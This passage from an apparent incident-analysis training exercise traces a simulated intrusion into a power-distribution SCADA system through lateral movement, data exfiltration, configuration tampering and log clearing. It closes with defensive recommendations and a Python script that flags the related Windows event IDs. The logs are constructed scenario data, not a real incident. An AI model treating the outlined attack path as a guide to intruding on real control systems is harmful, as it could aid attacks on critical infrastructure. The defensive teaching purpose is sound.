Objective: Move through the network to access critical operational technology (OT)
systems.

Logs and Analysis:

• Network Traffic Logs:
o Unusual SMB traffic indicating lateral movement.
o Time: 2024-08-01 10:30:00
o Source IP: 192.168.100.20
o Destination IP: 192.168.100.30
o Protocol: SMB
o Action: File access

Analyst Comment: The increase in SMB traffic between internal systems, especially file access attempts, suggests lateral movement.

Stage 6: Data Exfiltration

Objective: Extract sensitive operational data.

Logs and Analysis:

• Network Traffic Logs:
o Large data transfers to an external server.
o Time: 2024-08-01 11:00:00
o Source IP: 192.168.100.30
o Destination IP: 198.51.100.75
o Data Transferred: 3GB

Analyst Comment: The significant data transfer to an external server is a strong indicator of data exfiltration activities.

Stage 7: Disruption

Objective: Disrupt operations by altering control system configurations.

Logs and Analysis:

• SCADA System Logs:
o Unauthorised changes to control system configurations.
o Time: 2024-08-01 11:30:00
o User: SYSTEM
o Action: Configuration Change
o Details: Altered control parameters for power distribution

Analyst Comment: The unauthorised changes to control system configurations indicate an attempt to disrupt operations.

Stage 8: Cleanup

Objective: Remove traces of the attack to evade detection.

Logs and Analysis:

• Windows Event Logs:
o Use of a log cleaning tool to delete system logs.
o Time: 2024-08-01 12:00:00
o Host: SCADA-Server
o Event ID: 1102
o Action: System Event Log Cleared

Analyst Comment: The clearing of system event logs using a log cleaning tool indicates
the attacker is attempting to cover their tracks.

Full Analysis by Cybersecurity Analyst

Summary of Attack:

The attack began with reconnaissance, where the attacker used DNS queries to map
the internal network. The initial compromise was achieved through brute-force
attempts on the RDP service of the SCADA server, leading to a successful connection.
Persistence was established by installing a remote access tool (RAT) named
"RemoteAccessService." The attacker then escalated privileges to SYSTEM using a
known exploit. Lateral movement was observed with SMB traffic between internal
systems. Data exfiltration occurred via large data transfers to an external server. The
attacker then made unauthorised changes to the control system configurations,
leading to potential disruption of operations. Finally, the attacker attempted to clean up
by using a log cleaning tool to delete system event logs.

Recommendations:

1. Access Control:
o Implement multi-factor authentication (MFA) for remote access services
like RDP.
o Restrict RDP access to only necessary users and systems, and
implement strong password policies.
2. Endpoint Protection:
o Deploy and configure robust EDR solutions to detect and block
suspicious activities, such as brute-force attempts and the installation of
unauthorised services.
o Regularly update and patch all systems to prevent the exploitation of
known vulnerabilities.
3. Network Monitoring:
o Monitor network traffic for unusual patterns, such as increased SMB
traffic and large data transfers to external destinations.
o Implement network segmentation to limit the spread of lateral
movement.
4. Log Management:
o Ensure comprehensive logging and implement alerting mechanisms for
critical actions, such as privilege escalation and log clearing.
o Regularly review logs to detect early signs of malicious activities.
5. Incident Response:
o Develop and regularly test an incident response plan, including
procedures for detecting and responding to APT attacks on critical
infrastructure.
o Conduct threat hunting exercises to proactively identify potential threats.
6. Data Protection:
o Implement data loss prevention (DLP) solutions to monitor and prevent
unauthorised data transfers.
o Encrypt sensitive operational data both at rest and in transit to protect it
from exfiltration.
7. SCADA Security:
o Regularly audit and monitor SCADA system configurations for
unauthorised changes.
o Implement strict access controls and monitoring for SCADA systems to
prevent unauthorised access and configuration changes.
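
Scenarios 4 and 5 rest on four Windows event IDs: 4625 (with logon type 10) for the RDP brute force, 4698 for the scheduled task, 7045 for the service installation and 1102 for the cleared log. The Python below is an added example, not code from the original document: it triages constructed event records into stage alerts; the successful RDP logon is modelled as a 4624 with logon type 10 rather than taken from the network log, and the failure threshold, the service-binary allowlist and the task-path rule are assumptions.

```python
"""Triage the Windows event IDs from Scenarios 4 and 5 into APT-stage alerts.

Added example, not code from the original document. The event records are
constructed dicts carrying the fields the scenarios list (the successful RDP
logon is modelled as a 4624 with logon type 10); the failure threshold, the
service-binary allowlist and the task-path rule are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5                      # assumption: failed RDP logons from one source before alerting
FAIL_WINDOW = timedelta(minutes=10)     # assumption: window for the failures and the following success
KNOWN_SERVICES = {r"C:\Windows\System32\svchost.exe"}   # assumption: binaries expected in 7045 events
REMOTE_INTERACTIVE = "10"               # LogonType 10 = RemoteInteractive (RDP)

# Constructed events: (time, host, event id, fields). Five failures, one success, then the rest.
FAILED_RDP = [("2024-08-01 09:00:%02d" % (10 * i), "SCADA-Server", 4625,
               {"IpAddress": "203.0.113.200", "LogonType": "10", "Status": "0xC000006A"}) for i in range(5)]
EVENTS = FAILED_RDP + [
    ("2024-08-01 09:05:00", "SCADA-Server", 4624,
     {"IpAddress": "203.0.113.200", "LogonType": "10", "TargetUserName": "operator"}),
    ("2024-08-01 09:30:00", "SCADA-Server", 7045,
     {"ServiceName": "RemoteAccessService", "ImagePath": r"C:\Windows\System32\RemoteAccess.exe"}),
    ("2024-08-01 09:45:00", "Finance-PC", 4698, {"TaskName": "\\SystemUpdate", "SubjectUserName": "jdoe"}),
    ("2024-08-01 12:00:00", "SCADA-Server", 1102, {"SubjectUserName": "SYSTEM"}),
]


def detect_rdp_brute_force(events):
    """4625 bursts per (host, source) with logon type 10; a 4624 from the same source inside the
    window upgrades the alert from attempts to a confirmed initial compromise."""
    fails, successes = defaultdict(list), defaultdict(list)
    for t, host, eid, f in events:
        if f.get("LogonType") != REMOTE_INTERACTIVE:
            continue
        if eid == 4625:
            fails[(host, f["IpAddress"])].append(t)
        elif eid == 4624:
            successes[(host, f["IpAddress"])].append(t)
    alerts = []
    for (host, src), times in fails.items():
        times.sort()
        for i, t0 in enumerate(times):
            burst = [t for t in times[i:] if t - t0 <= FAIL_WINDOW]
            if len(burst) < FAIL_THRESHOLD:
                continue
            won = [s for s in successes.get((host, src), []) if burst[-1] <= s <= t0 + FAIL_WINDOW]
            stage = "Initial Compromise" if won else "Brute-force attempts"
            tail = f", then a successful logon at {won[0]:%H:%M:%S}" if won else ""
            alerts.append((stage, t0, f"{len(burst)} failed RDP logons to {host} from {src}{tail}"))
            break
    return alerts


def detect_service_install(events):
    """7045: a new service whose binary is not an expected one (check the signature in practice)."""
    return [("Establishing Persistence", t, f"service {f['ServiceName']} -> {f['ImagePath']} on {host}")
            for t, host, eid, f in events if eid == 7045 and f["ImagePath"] not in KNOWN_SERVICES]


def detect_task_created(events):
    """4698: scheduled tasks created outside the \\Microsoft\\ tree are reviewed."""
    return [("Establishing Persistence", t, f"task {f['TaskName']} by {f['SubjectUserName']} on {host}")
            for t, host, eid, f in events if eid == 4698 and not f["TaskName"].startswith("\\Microsoft\\")]


def detect_log_cleared(events):
    """1102 is written to the Security log when it is cleared (104 in the System log for the others)."""
    return [("Cleanup", t, f"Security log cleared on {host} by {f.get('SubjectUserName', '?')}")
            for t, host, eid, f in events if eid == 1102]


def triage(events):
    """Parse timestamps, run every detector, return (stage, time, summary) in time order."""
    parsed = [(datetime.strptime(t, "%Y-%m-%d %H:%M:%S"), host, eid, f) for t, host, eid, f in events]
    alerts = (detect_rdp_brute_force(parsed) + detect_service_install(parsed)
              + detect_task_created(parsed) + detect_log_cleared(parsed))
    return [(s, t.strftime("%Y-%m-%d %H:%M:%S"), w) for s, t, w in sorted(alerts, key=lambda a: a[1])]


if __name__ == "__main__":
    for stage, when, what in triage(EVENTS):
        print(f"{when}  {stage:24} {what}")
```

Because the 1102 record itself survives the clearing, it is the one event a collector forwarding logs off-host will always retain; the SCADA configuration change in Stage 7 has no Windows event ID and needs the OT system's own audit trail.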
